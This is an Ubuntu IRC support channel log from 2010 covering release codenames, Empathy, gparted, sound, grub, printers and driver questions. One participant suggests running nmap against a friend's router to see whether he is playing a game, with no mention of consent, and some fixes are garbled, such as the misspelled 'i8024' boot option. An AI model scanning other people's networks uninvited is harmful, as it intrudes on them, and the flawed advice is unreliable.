icerootwocao: lucid is an LTS Version with newer software and some big changes (using upstart instead of the normal init-process)15:13
sidneybastid_raZor: youre right that was it thanks15:13
Fudgeanyone use empathy with irc?15:13
Piciwocao: http://www.ubuntu.com/getubuntu/releasenotes/1004 lists some of the changes Lucid brings15:14
Fudgea friend doenst seem to know if its possible to automatically log onto an irc server and channel15:14
DarkStar1wocao: and https://wiki.ubuntu.com/KarmicKoala/TechnicalOverview for kharmic15:14
wocaodeos 10.04 is lucid ?15:15
DarkStar1wocao: Yup15:15
wocaodoes 10.04 is lucid ?15:15
bazhangwocao, Yes15:15
chadiyes it does15:16
thesheff17is anyone running the ubuntu enterprise cloud?  on the interface I get this error under store:  Error: failed to connect to local store proxy. Is it installed?15:16
wocaomay be I need a  kharmic15:16
wocaowhat's the lasted  kharmic version is15:17
DarkStar1wocao: the choice is up to you. Kharmic is 9.1015:17
Piciwocao: 'karmic' is merely the codename for 9.10.  'lucid' is the codename for 10.0415:17
Fudgeno one use irc on empathy here?15:17
Kane_Hartis there a way to say ping a friends router on a certian port to see if their using it at that time like ftp or playing a game that u know what port it is?15:17
FudgeKane_Hart  try nmap there ip for open ports?15:18
DarkStar1Fudge: I still use pidgin but I will relog onto empathy in a sec and give it a go15:18
FudgeDarkStar1  thankyou, my friend jsut needs to know how to automatically connect to irc #chan :D15:18
Kane_Hartbut does a router open a port automaticly or would it still be closed?15:18
Fudgedonno why he doesnt use pidgin :)15:18
wolfpupquestion is there a way to lock the size of the coversation window in empathy15:19
iflemawolfpup during irc?15:19
emxi__I am trying to increase my monitor resolution, nothing seems to work. Im stuck with 800x400 :(15:20
wolfpupi want it to use a mult line entry not expand the window while im typing15:20
iflemawolfpup tis a know bug.... i think if you hide the user list or widen it or something i forget for a workaround15:20
scuniziKane_Hart: most routers open ports on demand from *inside* the LAN.. pinging the port from outside the lan may or may not tell you anything15:20
wocaowhere is  arm unbunt  source list ?15:21
wolfpupim wanting to keep it narrow on my screen but it keeps expanding15:21
Kane_Hartthats to bad lol15:21
wolfpupwhen ever i type a message15:21
Kane_HartI want to know if hes playing warcraft again or not :P15:21
scuniziwocao: ubuntu doesn't have an arm source15:21
MrPink1Tonus: hey15:21
iflemawolfpup I think one of the themes is immune15:22
wolfpupim useing the defaut15:22
struhevolinstead of using wget can i use something else15:22
Farkiewhat's wrong with wget ?15:22
llutzstruhevol: to do what?15:22
spanglesontoasthow do I boot into single user mode on lucid ?15:23
struhevolwhen i use it connection timed out15:23
spanglesontoastvia grub ?15:23
Farkiestruhevol, can you get any networking?15:23
struhevoli have internet15:23
struhevolo i can connect to the web15:23
DarkStar1Oooohhh.. fancier graphics with empathy15:24
wolfpupwhis is ubuntu theme iflema15:24
thune3struhevol: curl15:24
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Fudgelol DarkStar115:25
iflemawolfpup actually it effects them all...... the problem has been reported in ubuntu and upstream......15:25
Fudgetry fetch?15:25
thesheff17spanglesontoast: try this link15:25
Fudgewgeet -c is helpful as it doesnt start the file from the start if you can connect to that host/ip15:26
DarkStar1Fudge: fetch?15:26
megadethI have 80GB of unallocated space. Whenever I try to create a new partition with gparted, it says the kernel was unable to re-read the partition table on /dev/sda (device or resource busy)..15:26
wolfpupit was working fine til this morning when i turned on my laptop after updating the mplayer lastnight15:26
DarkStar1megadeth: that's probably because you need to unmount the space15:27
megadethDarkStar1, they aren't mounted15:27
Fudgeyes DarkStar1 , doesnt fetch do similar job to wget?15:27
thesheff17megadeth I just use gparted15:27
MrPink1can someone write a messege to me like this: "MrPink1: BlA"   just want to see how pidgin highlights it... :)15:27
daleybMrPink1, lo15:28
thesheff17for drive changes15:28
megadeththesheff17: uh yeah, that's what I said I'm using.15:28
DarkStar1Fudge: aahh... I couldn't tell you as I've never had the need to use either15:28
MrPink1daleyb: hmm it barely does anything -.-15:28
thesheff17then something is mounted15:28
DarkStar1MrPink1: Calling MrPink1.. Do you read over? :P15:28
thesheff17I have never had problems with gparted15:28
spanglesontoaststill getting probs with grub can't escape or get into the boot menu to boot into single user mode15:29
thesheff17try using fdisk15:29
megadethWell, something is wrong with it. None of the drives are mounted. I tried rebooting, It ried it from the LiveCD. I still get the same error15:29
wolfpupiflema would you know how to enable the media function keys on a laptop that has a full 102 keyboard in it with media controls on the function keys ans an fn key to acces those functions?15:29
daleybspanglesontoast, using 10.04?15:29
DarkStar1megadeth: The partition is mounted even if it's un allocated. I always recommend all partitioning be done using livecd session15:29
wolfpupim useing lucid15:29
anyoneofussomeone help /me configure havp + squid. this is my havp.config http://paste.ubuntu.com/449673/15:30
megadethDarkStar1: I'm on the LiveCd right now.15:30
spanglesontoastyes I am 10.0415:30
anyoneofusmy havp can't block com file, zip file15:30
DarkStar1Ok I'm starting to not like Empathy15:30
daleybTry holding shift on boot spanglesontoast15:30
wSogeI somehow destroyed my install of mint, I orignally had a dual booting win7 + winXP and then I installed linux too, grub took over. It worked fine, until I selected some kind of recovery partition causing grub to mess up. Now I am presented with "error: uknown filesystem." and "grub rescue>", anyone can help me fix it?15:31
Fudgehave you asked gparted to check the  drive, beep15:31
Fudgelike my roger beep DarkStar1 ?15:31
Fudgeoop,s beep15:31
spanglesontoastoks thanks very much :)15:31
spanglesontoastbe back soon15:31
bastid_raZor!mintsupport | wSoge15:31
ubottuwSoge: Linux Mint is not a supported derivative of Ubuntu, please seek support in #linuxmint-help on irc.spotchat.org15:31
DarkStar1Fudge: Eerrr... what beep?15:31
Fudgemy roger beep, beep15:31
Fudgei can hear it, in my head loL, beep15:31
megadethSigh. How many times do I have to say they aren't mounted15:32
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DarkStar1Fudge: Well it only sounds off in yer head then. I hear nothing :)15:32
iflemawolfpup do the multimedia keys work with rhythmbox?15:33
megadethI have 80GB of unallocated space. Whenever I try to create a new partition with gparted, it says the kernel was unable to re-read the partition table on /dev/sda (device or resource busy).. The drives are NOT mounted. I tried it on the LiveCD as well15:33
DarkStar1megadeth: can you show me the output of your mount command just to be sure and the uuid of the partition you're trying to mount along with the error you get again please?15:33
thesheff17megadeth: I would try to use fdisk /dev/sda and create the new partition and use w to write it.   I have seen where it will say it is mounted but on the next reboot the new table will be picked up.15:33
thesheff17also the free space doesn't exist in the middle of the drive does it?15:34
geirhamegadeth: no lock/key icons on any of the partitions on that drive? The liveCD will automatically mount any swap partition if it finds one.15:34
thesheff17what is the output of sudo mount15:34
DarkStar1Fudge: you still there?15:36
wolfpupyes they do ifema but im wanint to get the ot be accepted into another media player as well15:37
Fudgeyeah mate just chatting on blufudge too with the guy on empathy15:37
DarkStar1Fudge: DO you know how to disable join and leave messages?.. I can't see the option anywhere15:37
thesheff17haha I was just thinking the same thing15:38
Fudgein irssi i do /ignore #ubuntu  joins parts quits modes nicks topics and the channel is beautiful and quiet15:38
wolfpupand that player already has entrys for the media keys but it is not seeing them when it is running ifema15:38
panfisti accidentally clicked alt-middle click instead of of alt-left click, the result was a zoomed into my desktop. how do i go back?15:39
mickster04panfist: did you try clicking it again?15:40
panfistyes, it zoomed in more15:40
frxstremis it possible to give users other than root the ability to use port numbers below 1024?15:40
occy1Ubuntu Sound hates me.15:40
=== occy1 is now known as occy
remaiiyop all15:40
mickster04panfist: add a shift to the combo15:41
LantiziaAnyone ever found out how to get CC to show up in a column view on Thunderbird?15:41
nehyxoccy: What happends with your sound?15:41
remaiiquelq'un peut m'aidé ?*15:41
magnetronhi, i have a problem with graphics on lucid. after running while, the graphics will be replaced with lots of horizental lines. nvidia card with the nvidia-current driver15:41
magnetron!fr | remote15:41
ubotturemote: Ce canal est en anglais uniquement. Si vous avez besoin d'aide ou voulez discuter en francais, merci de rejoindre #ubuntu-fr, ou #ubuntu-qc. Merci.15:41
occynehyx: really odd stuff...  like, I can get WoW (world of warcraft) to work... and sound plays there, I can get Vent working with sound... but then it mutes on and off...15:41
thesheff17_frxstrem: yes...I have seen a ubuntu package for this but never used it.15:41
magnetron!lastlog frxstrem15:42
remaiidsl ^15:42
frxstremthesheff17_: any idea what it's called?15:42
nehyxoccy: Only happens with that games, or sound is corrupt in general?15:42
occynehyx: and mangler won't work at all... If pulseaudio is going, I can't hearany sound at all15:42
occynehyx: I have to apt-get remove pulseaudio to hear anything at all15:42
abhinav_singhMouse is not working for only my account...it is working in root and all other accounts......how to solve it15:42
nehyxoccy: Try this command >> sudo apt-get install libsdl1.2debian-pulseaudio15:43
Fudgecant you compile mangler without pulse?15:43
llutzfrxstrem: authbind maybe15:43
frxstremllutz: yes, that's it :) thanks15:43
occynehyx: says it's already the newest version15:43
thesheff17_frxstrem: http://manpages.ubuntu.com/manpages/jaunty/man1/privbind.1.html15:43
occyFudge: haven't tried that... I've tried to stay away from compiling since 99' heh15:44
rambo3where do i get php5.2 ?15:44
frxstremare there any major differences between authbind and privbind?15:44
thesheff17_haha I haven't used either15:45
occynehyx: odd thing is.... 9.04 I never had any problems with sound... 9.10... and 10.04 hurt me long time.15:45
DarkStar1Ok I'm going back to pidgin had enough of this15:45
Guest4109hello all15:46
josephnexusi have an interesting problem.  I try to go to digg.com and the page stops loading (it eternally just says it is loading... and does get as far as loading the title)15:46
josephnexusone other page does the same thing15:46
josephnexusbut everywhere else loads15:46
josephnexusany ideas?15:46
DarkStar1much better15:46
occyjosephnexus: only on digg.com ?15:46
josephnexusthose sites work when trying from another machine that is also running ubuntu 10.0415:46
Fudgethe #mangler guys are very friendly and like a stir15:46
NitzchONotHello, can i install Kubuntu Desktop and also keep my Ubuntu Desktop ? (Just to test KDE)15:46
josephnexusdigg.com and a handful of other sites15:46
magnetronNitzchONot: yes.15:47
josephnexusi know that digg.com is up though15:47
matteo1990 Hi all, i have an Nvidia Geforce 8400 Gs on an Ubuntu 10.04 machine with current driver installed (nvidia settings tell me that is the 195). I always see 1080p films on my tv so i use mplayer with vdpau. I get sometimes a bunch of pixels not changing colr for a while... What can i do? Do i need to buy a better video-card? Do i need to change the drivers? Is fault of Mplayer?15:47
nehyxNitzchONot: Yes, using dual boot15:47
nehyxNitzchONot: Or just installing KDE and having GNOME and KDE in same OS15:47
josephnexusmatteo1990: your video is probably the issue15:47
josephnexusnot your hardware15:47
occyFudge: yeah, they were fairly nice, but I was trying to get mic working then.  I really believe it's a serious Ubuntu soundsystem Charlie Foxtrot15:47
NitzchONotmagnetron & nehyx, and what if i want to 'uninstall' it ? Will this effect my Gnome Desktop at all ?15:47
josephnexusanyone have any ideas why certain sites won't ever finish loading for me?15:48
thesheff17_try a different browser like chrome15:48
thesheff17_see if you have the same problems15:48
DarkStar1NitzchONot: No15:48
matteo1990josephnexus, I havent understand, i have an lg 42 inch full HD with hdmi connection, what can cause a problem?15:48
thesheff17_if you do maybe some DNS problem15:48
occynehyx: or Fudge you guys know how I can "purge" my sound system and get it the way it should be by default?15:48
magnetronNitzchONot: no.15:48
NitzchONotDarkStar1 & magnetron, thank you :)15:48
magnetronNitzchONot: i recommend you install it with aptitude, will make it easier to remove later15:48
DarkStar1Speaking of sound system........... I need to see if my sound still works15:48
occyDarkStar1: lol15:49
josephnexusthe name resolves theshelf17_15:49
Fudgeoccy  ive been trying to find a cli version but no luck15:49
josephnexusI can successfully ping digg.com15:49
keith_hey hello everyone hows your day going ?15:49
occyFudge: yeah...  :(15:49
NitzchONotmagnetron: u mean "sudo aptitude install kubuntu-desktop" yes ?15:49
NitzchONotor just "apt-get install"15:50
magnetronNitzchONot: yes, use aptitude15:50
thesheff17_check you /etc/resolv.conf what version of firefox are you using...have you ran all the updates?15:50
NitzchONotmagnetron: thank you :)15:50
keith_well got to go now just wanted to say hello15:50
vividhehe, nvidia-current update....to an old version :D15:51
josephnexustheshelf17_ : like I said, the name resolves to an IP15:52
DarkStar1Weeeee...... It's still there15:52
josephnexusi'm on the latest firefox included with 10.0415:52
josephnexusthe nameserver is the same as what my wife's machine uses15:52
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josephnexusand hers doesn't have this problem15:52
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bserijasMerry Christmas!15:53
thesheff17_chrome does the same thing?15:53
josephnexusthat's what I thought15:53
thesheff17_well then it isn't firefox screwing up...you don't have any iptables or firewalls15:54
thesheff17_do you?15:54
josephnexusi haven't changed anything as far as firewalls are concerned from the default15:54
thesheff17_does sudo iptables -L15:54
thesheff17_what is that output15:54
Picijosephnexus: There are no iptables rules by default, so you should be fine.15:54
josephnexussudo ufw status15:54
josephnexus[sudo] password for joseph:15:55
josephnexusStatus: inactive15:55
josephnexusChain INPUT (policy ACCEPT)15:55
josephnexustarget     prot opt source               destination15:55
ActionParsnip!paste | josephnexus15:55
ubottujosephnexus: For posting multi-line texts into the channel, please use http://paste.ubuntu.com | To post !screenshots use http://tinyurl.com/imagebin | !pastebinit to paste directly from command line | Make sure you give us the URL for your paste - see also the channel topic.15:55
josephnexusChain FORWARD (policy ACCEPT)15:55
josephnexustarget     prot opt source               destination15:55
FloodBot2josephnexus: Please don't flood, use http://paste.ubuntu.com to paste, don't use Enter as punctuation.15:55
josephnexusChain OUTPUT (policy ACCEPT)15:55
josephnexustarget     prot opt source               destination15:55
thesheff17_yea that looks ifne15:55
mfraz74nvidia 195.36.24 drivers are available for 10.04 now15:55
thesheff17_what does route say?15:56
thesheff17_so sudo route15:56
josephnexusi didn't think 7 lines was too much, but I guess I was wrong15:56
josephnexusmy apologies15:56
josephnexusdid you get my output?15:56
thesheff17_iptables looks fine15:57
thesheff17_what does sudo route have?15:57
NitzchONotmagnetron: Ok, im doing the installation part and it asks me what i want for Default Display manager (gdm/kdm)15:57
NitzchONotmagnetron: will i be able to change that whenever i want? (Like if i dont want to have KDE as my desktop)15:58
p1l0tMy CDROM is no longer mounting since upgrade to Lucid 10.04 server. Fstab is looking for /dev/hda but I don't see an hda in /dev.. There is a cdrom1 in /dev though..15:58
josephnexusit shows my router at home15:59
josephnexusand apparently that router is working15:59
josephnexusand I can reach digg.com15:59
josephnexusit's just after the title loads, nothing else does15:59
matteo1990 Hi all, i have an Nvidia Geforce 8400 Gs on an Ubuntu 10.04 machine with current driver installed (nvidia settings tell me that is the 195). I always see 1080p films on my tv so i use mplayer with vdpau. I get sometimes a bunch of pixels not changing colr for a while... What can i do? Do i need to buy a better video-card? Do i need to change the drivers? Is fault of Mplayer?16:00
josephnexusthe pixels not changing is probably your video source16:00
magnetronNitzchONot: you can set GDM as the default, as soon as GDM starts you can still log in into KDE16:00
ActionParsnipp1l0t: can you use a pastebin to give the output of: sudo lshw -C disk; cat /etc/fstab16:00
NitzchONotmagnetron: how can i change that if i want? (Because i already set KDM as default)16:01
p1l0tActionParsnip sure can16:01
ActionParsnipp1l0t: thanks16:01
albechwhy was the old gnome-keyboard-selector tool removed?16:01
albechit is no longer available in the panel16:02
KukManhi. I have sources with debian/rules. Where can I set package depends?16:02
NitzchONotalbech: i think ur still able to choose a layout for ur keyboard16:02
thune3josephnexus: you could try the "net" panel in the ff extension "firebug", to see if you can tell what element is stalling on you16:02
KukManI want replace libcupsys2 by libcups216:02
ActionParsnipKukMan: http://packages.ubuntu.com   maybe16:02
daleyb!lastlog daleyb16:03
albechNitzchONot, well it was a nice convenient way to go back and forth between english and thai keyboard.16:03
magnetronNitzchONot: manage what?16:03
kaspirquick question. Is there a command for the terminal to find my wireless card information?16:04
NitzchONotmagnetron: i said 'how to change' from KDM to GDM if i want to :)16:04
KukManActionParsnip, This is drivers for Canon. It s for debian, not ubuntu. And, it depends on libcupsys2, which in ubuntu names libcups216:04
patusovniakwhat is dmesg16:04
Fudgeis there a netbook remix channel?16:05
ActionParsnipKukMan: debian isnt supported here16:05
albechdoes anyone else know a tool where i can switch easily between a thai and english keyboard layout?16:05
NitzchONotalbech: as far as i can understand u want to change from English to Thai languages, correct ? So, u want to change the Keyboard Layout, yes ?16:05
patusovniakbserijas, hi ;)16:05
albechNitzchONot, correct16:05
yodayHello folks. I have a group of very stubborn and old folks the do not want to leave windows behind. I want to secretly convert them to linux (they mostly use Chrome, MSNIM, and Open Office), but I have yet to find a complete windows look and feel solution. I tried some GNOME and KDE themes, but often times they only change a few things. I also do not have a lot of experience with GUI customization, so I would like something that is easy to install. I would also b16:06
josephnexusthe net tab in firebug tells me (when I look at the response) that everything came through16:06
josephnexusi can see all of the code16:06
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josephnexusand I go to the css tab, and i can see all of the css16:06
josephnexusbut the screen remains blank16:06
josephnexusand this happens for chrome as well16:06
ubottuPlease try to keep your questions/responses on one line - don't use the "Enter" key as punctuation!16:06
albechNitzchONot, there used to be a nice applet i could add to my panel, but it is no longer available.. it was when i first installed 10.0416:06
magnetronNitzchONot: i think you have to use the update-alternatives tool to choose between kdm and gdm, when both are installed16:06
KukManActionParsnip, I have question about ubuntu and dpkg-buildpackage, not debian16:06
ActionParsnipyoday: what version of windows do they use?16:06
robin0800albech: keyboard preferences layout options16:06
patusovniakbserijas, how are you?16:06
NitzchONotalbech: i assume u already installed the languages. You can go to "System -> Prefferences -> Keyboard"16:06
NitzchONotmagnetron: thanks :)16:07
kaspirCan anyone tell me if there is a command for the terminal to bring up wireless card specs?16:07
KukMani have sources which I can build into deb package16:07
albechNitzchONot, yes the languages are there16:07
ActionParsnipyoday: if its XP then there is a script to make gnome look like XP: http://ubuntu.online02.com/node/1416:07
KukManAnd I want to replace some depends in result deb package16:07
magnetronkaspir: that depends on what you want to know about the wireless card16:07
yoday@ActionParsnip win7 and xp, but they are open to upgrading/downgrading to either16:07
albechNitzchONot, i just dont want to go into all these menus to change the key map, since im doing it ~100 times a day16:07
NitzchONotalbech: at the Layout, add your language and u can change the key combination if u want too16:07
kaspirmagnetron: I just need to know what wireless card I have for compatibility reasons16:08
ActionParsnipyoday: theres a Win7 one which is similar too (I use it to confuse my mates:))16:08
NitzchONotalbech: theres an option to change by pressing "Alt+Shift"16:08
yodaythank you folks, have a great day16:08
trismalbech: do you have the notification area in your panel? the keyboard applet should automatically show up there if you have more than one layout16:08
NitzchONotwhat trism said actually :)16:09
thune3josephnexus: so firefox lists done? at the bottom of the 'net' tab it says "86 requests" or something around there?16:09
p1l0tActionParsnip http://pastebin.com/W4cHZ5z0 I couldn't copy the output but the logical names are (/dev) CDROM1 scd0 sr016:09
josephnexuslet me look again16:09
magnetronkaspir: you could probably find the chipset name in the output from the 'lspci' command. but it won't give you the model/make of the card16:10
dowxpis there a tech hardware channel#?16:10
josephnexusnow it is showing stuff... but it says it is still loading16:10
ActionParsnipp1l0t: you didnt give the output of: sudo lshw -C disk16:10
albechNitzchONot, ill play around with that thanks16:10
ActionParsnipdowxp: ##hardware16:10
bazhangdowxp, ##hardware16:10
albechtrism, yes the notification area is there and there are 3 different key layouts installed, yet it does not show up :(16:10
kaspirmagnetron: how would you suggest finding the model/make of the card then?16:10
sdkHeyas all.. Is there a way to get a menuitem on a right click menu to encrypt a file?  i.e. somefile.txt <right click> Encrypt File.... etc. ?16:10
magnetronkaspir: opening the computer case :D16:10
NitzchONotalbech: Theres a button that says "Options" if i remember correct, there u can change the key combination for the keyboard layouts :)16:11
ActionParsnipp1l0t: you will need to run: gksudo gedit /etc/fstab      and add this line:   /dev/scd0 /media/cdrom0 udf,iso9660 user,noauto 0 016:11
magnetronsdk: yes. wait a sec and i will find it16:11
sdkI have Seahorse installed 10.04 FYI.16:11
kaspirmagnetron: haha as fun as that sounds, I would like to keep my computer in one piece and working16:11
sdkmagnetron: Thanks.. been looking for 20 mins and can't find it..16:11
p1l0tActionParsnip thanks16:11
ActionParsnipp1l0t: assuming /dev/scd0  is the device name for your optical drive, the lshw output will tell you what it is16:11
xivenIn what area is Ubuntu lacking a good application? (excluding debugging/ides)16:12
ikoniaxiven: office, web development, project managment tools, networking design tools, but thats linux in general, not just ubuntu16:12
fatalitycan anyone help to me  i cant use my touchpad16:13
=== fatality is now known as Guest16829
josephnexusxiven, the IDEs available for linux aren't half bad, but it does lack some good project management tools16:13
matteo1990 Hi all, i have an Nvidia Geforce 8400 Gs on an Ubuntu 10.04 machine with current driver installed (nvidia settings tell me that is the 195). I always see 1080p films on my tv so i use mplayer with vdpau. I get sometimes a bunch of pixels not changing colr for a while... What can i do? Do i need to buy a better video-card? Do i need to change the drivers? Is fault of Mplayer?16:13
sdkHeh, I juust borke Firefos.  :)16:13
josephnexusmatteo1990: i've told you, the issue is probably with your video source16:13
magnetronsdk: you need the seahorse-plugins package. full guide at http://savvyadmin.com/gnupg-context-menu-options-for-gnome-nautilus/16:14
josephnexusnot with how it is playing back, unless you are getting dropped frames16:14
sdkErr broke firefox. :)16:14
xivenI'm not sure exactly what a project manager would even do16:14
Guest16829i couldnt use my touchpad can anyone help to me i am using ubuntu16:14
sdkmagnetron: Beaut, headed there now.  Thanks man.16:14
trismalbech: not sure what to check, as far as I can see gnome-settings-daemon is hard-coded to show it with greater than 1 keyboard layout, and I've looked for ways to disable it16:14
xivenI always planned and kept notes using a plain text editor.16:14
xivenAnd, the last project manager I tried using was really buggy, so I removed it.16:15
JackStonerHey, having a weird thing happening when i open an app (mostly vlc), it opens another small window with no description, why is this?16:15
thune3josephnexus: any results? you tried a shift-reload?16:15
JackStonerHey, having a weird thing happening on kubuntu when i open an app (mostly vlc), it opens another small window with no description, why is this?16:15
mfraz74matteo1990: which version of the nvidia drivers?16:15
xivenMaybe I'll look into improving one of the existing project managers though16:15
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domnukaluHi, I'm trying to install my grpahic card, and I think I found a bug for mine. The bug has the label fix released, but I'm on the launchpad page, and I can't find the actual fix. Can someone please help me? This is the bug page: https://bugs.launchpad.net/ubuntu/lucid/+source/linux/+bug/50927316:16
Fudgeanyone here got an eeepc16:16
resqulwhats the off-topic channel?16:17
Piciresqul: #ubuntu-offtopic16:17
resqulPici thanks16:17
josephnexusthe net tab is showing me what's hanging, but that doesn't help me resolve the issue at all16:17
thune3josephnexus: what's hanging? i'm curious16:18
josephnexussomething that says16:18
p1l0tDo I need to reboot after modifing fstab or can I do /etc/init.d/ftsab restart or something?16:18
Pici!enter | josephnexus16:18
ubottujosephnexus: Please try to keep your questions/responses on one line - don't use the "Enter" key as punctuation!16:18
josephnexusGET dynjs$some_hash_here16:18
ActionParsnipGuest16829: try i8024.reset   as a boot option in /etc/default/grub16:19
ikoniajosephnexus: stop that - this is an ubuntu support channel only16:19
josephnexusthis was in response to thune3's question16:19
ActionParsnipGuest16829: or try: i8024.nomux=1   instead, or try bot together16:19
josephnexusthune3, mind if I PM you, people here seem to think I am spamming the channel16:20
Picijosephnexus: Its fine, just stop pressing enter between every 5 words.16:20
ubottuPlease try to keep your questions/responses on one line - don't use the "Enter" key as punctuation!16:20
thune3josephnexus: sure16:21
ribothey guys..i hve this problem that my motd changes automatically16:22
JessDCan empathy provide a channel list?16:22
yakamo_anyone had problems getting a nvidia geforce4 440 go to work16:22
yakamo_i can't get above 800x64016:22
ActionParsnipGuest16829: This line: GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"   defies the boot options in /etc/default/grub   add the options, save the file then run: sudo update-grub16:22
SlidingHorn!res | yakamo_16:23
ALBASLplease i have problem with printing16:23
ubottuyakamo_: The X Window System is the part of your system that's responsible for graphical output. To restart your X, type « sudo /etc/init.d/?dm restart » in a console - To fix screen resolution or other X problems: https://wiki.ubuntu.com/X/Config/Resolution16:23
ActionParsnipGuest16829: try each option on that line, see if those 2 make it work16:23
sanghowhat is the advanced heap algorithm?16:23
sanghois there any improved heap algorithm?16:23
ALBASLcan any one help me ??16:23
Picisangho: Are you sure this question is on-topic for #ubuntu ?16:24
yakamo_ubottu: dosnt work!!16:24
sanghonot really16:24
ubottuHi! I'm #ubuntu's favorite infobot, you can search my brain yourself at http://ubottu.com/factoids.cgi - Usage info: http://wiki.ubuntu.com/IRC/Bots16:24
Picisangho: Then its probably better to ask in ##programming, or the programming language channel that you're implementing under.16:24
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LuisVhello.. is possible to install palimpsest disc utility on ubuntu 9.04 (jaunty)?16:25
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ALBASLwhen i plug the USB for my printer noting happens !!16:26
spezticlewhen i use system/administration/users and groups to change passwords for a user, it's not changing it to the new password, why is this?16:26
galerienHi everyone, I just wanted to ask if you knew any synchronization program for android <=> ubuntu16:27
Guest16829my touchpad  doesnt working can anyone help to me?? it was working before ubuntu16:27
LuisVis this a help channel?16:27
LjLLuisV: yes16:27
zkriesseLuisV: It is....16:27
LuisV<LjL> ok thanks16:28
daleybspezticle, does the user that you're logged in and changing the passwords have the appropriate access, for example, sudo?16:28
nailorawhats the recommended way for creating admin users from command line? just create them via adduser as normal users and put the in the admin group?16:28
ALBASLplease can someone help16:29
daleybnailora, can do, useradd -g group username is a simple way16:29
spezticledaleyb: yes. seahorse reflects the new password, but login does not16:29
indian_munndacan anyone tell me how can i find drivers for redhat enterprize linux. I am trying to install it on my newly bought hardware. I have installed Ubuntu 9.10 on it successfully but redhat enterprize 5.2 says "No Drivers Found".  Can anyone help????16:29
Picinailora, daleyb: Yes, but its best to use adduser (not useradd).16:29
Piciindian_munnda: This channel is only for Ubuntu support, not RHEL.16:30
nailoradaleyb: yeah, but is adding him to the group all i have to do to make a proper admin or is there something more i have to do16:30
daleybFair enough, I'm from RHEL background so i'd never really heard of adduser until recfent.16:30
Picinailora: Thats all you need to do.  You may want to also drop them in the adm group though, so that they can read logfiles in /var/log/16:31
indian_munndaPici, sorry buddy i know that but RHEL people not helping me in troubleshooting, they are saying to wait for next version of RHEL. So i thought may be i would get some help here. :)16:31
nailoraPici: adm group: there we go :) -- more gotchas like that ?16:31
Piciindian_munnda: How are we supposed to help you with RHEL?16:31
tahhiI'm trying to rebuild the package for perl, with 64bit int enabled.16:32
tahhiI basically did;16:32
indian_munndaPici, just let me know if there is a way to get drivers for my hardware from somewhere for linux?16:32
tahhiapt-get build-dep perl16:32
Piciindian_munnda: Try ##linux if the RHEL channel isn't helping.  We can't help you here in #ubuntu, sorry.16:32
ALBASLmy printer is working on my Vista but it dose not work with ubuntu.... why???16:32
albechindian_munnda, most hardware should be detected during the install.. shouldnt matter which version of linux16:33
tahhiand then ./Configure -Duse_64bit_int16:33
galerienHi everyone, I just wanted to ask if you knew any synchronization program for android <=> ubuntu16:33
cyphaseALBASL: which printer?16:33
ALBASLBTW... it was working a week a go16:33
indian_munndaPici, ok no problem buddy. You already helped me a lot buddy. thanks man :)16:33
tahhiand then make16:33
indian_munndaalbech, its not detecting hardware thats why i asked it. :)16:33
ALBASLHP 555016:33
nailorathx daleyb Pici16:33
tahhiafter which I did dpkg-buildpackage -rfakeroot16:34
tahhidoes this sound correct?16:34
ALBASLit was working but i do not know what happened16:34
Healerhi, could somebody suggest me a jabber client(preferably for gnome) please?16:34
spezticlewell not using the application, but doing it with terminal / passwd works fine16:34
llutzHealer: pidgin16:34
spezticlestupid gui's messing things up :-/16:34
albechindian_munnda, when you phrase that question in other channels you should try being a little more specific.. what hardware? your external thermometer? ;)16:34
cyphaseHealer, empathy comes with ubutnu, or pidgin which used to16:34
zkriesseHealer: pidgin my friend16:34
bagelsI'm having trouble installing my broadcom wireless adapter while offline.  the website says if I add the ubuntu disc as a repository it will install, but I keep getting an error.16:35
indian_munndaalbech: when it starts loading /sbin/loader then it give the error "Kernel Panic: Fatal exception".16:36
nailoraHealer: you might give gajim i try if you do not need multi-protocol support but just plain jabber16:36
thune3ALBASL: is printer detected? what do you mean by "not work"? where is the failure?16:36
tahhibagels, apt-get install bc43-fwcutter16:36
bagelstahhi, i can't i don't have internet on my linux box.16:36
p1l0tIf my CD-ROM has a physical id od 0.0.0 is that a problem?16:36
bagelsif I had access to ethernet, my problem would be solved.16:37
albechindian_munnda, lets not discuss RHEL issues here, but that sounds like you are trying to install a version for a different architecture16:37
tahhip1l0t, unlikely16:37
tahhibagels, go get the package on an USB drive and that'll do.16:37
indian_munndaalbech, actually my hardware is newer than the software version. :)16:37
p1l0ttahhi you mean unlikely as in that isn't likely to be its id?16:37
bazhangindian_munnda, please stop.16:37
ALBASLthune3: when i plug in the USB nothing happens !!  i tried to print from OO but it gave me eror16:37
tahhiunlikely to be a problem.16:38
bagelscan you direct me to the package? I've been wandering about in circles online all day.16:38
bagels^ @ tahhi16:38
p1l0toh ok16:38
albechindian_munnda, thats got nothing to do with what i said16:38
Healernailora, thanks16:38
indian_munndabazhang, ok ok sorry again i wont disscuss it anymore here ..:)16:38
=== NoX is now known as siantoine13
galerienHi everyone, I just wanted to ask if you knew any synchronization program for android <=> ubuntu16:39
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ALBASLthune3: did you get my point??.....16:39
tahhibagels, wait, you have to have access to the internet anyway....16:39
bagelsyes, on my windows machine, tahhi.16:40
con-manhey right now im connected to my work vpn but only IP addys work not computer names, what I can do to remedy this.  ie I can only rdesktop using ip addresses16:40
shayaknychi all, i'm hoping someone can help me figure out why my ssh server in ubuntu 10.04 cannot be accessed remotely (doesn't even connect) until someone is logged in at the local machine16:40
p1l0tmount says /dev/sr0 unknown device16:40
bagelsI did it before, but years ago on Hardy XD16:40
thune3ALBASL: does System->Administration->Printing show a printer?16:40
tahhibagels, the bc43-fwcutter will go and download the drivers....so even if you do get the bc43-fwcutter.deb on your USB, it's rather pointless...16:40
bradpitthi. i need help.. i just installed kubuntu lucid, and after installing nvidia driver i type sudo nvidia-xconfig and kdesudo nvidia-settings, but it won't let me to save xorg. this is the error msg " Unable to open X config file '/etc/X11/xorg.conf' for writing. "16:40
tahhiyeah, because the file does not exist.16:41
ALBASLthune3: it says "not connected"16:41
DarkStar1shayaknyc: Any services you wish to provide require that the system be active. Just because you switch it on doesn't mean it's active16:41
mcl0vinGood morning folks16:42
thune3ALBASL: but your printer is listed?16:42
p1l0tmount: /dev/sr0 unknown device16:42
bagelstahhi, I find it hard to believe that there's no way to install it with no internet.  the .deb has to be available somewhere16:42
ALBASLthune3: NO!16:42
shayaknycdarkstar1: well, then how can i configure it so that the service is active before anyone logs in?16:42
bagelswhat about ndiswrapper?16:42
del_diabloMass Effect is not working: http://www.fpaste.org/QwsM/ http://fpaste.org/8Oy6/ HELP!16:43
tahhithe deb with drivers in it cannot be made due to the fact that the drivers are proprietary.16:43
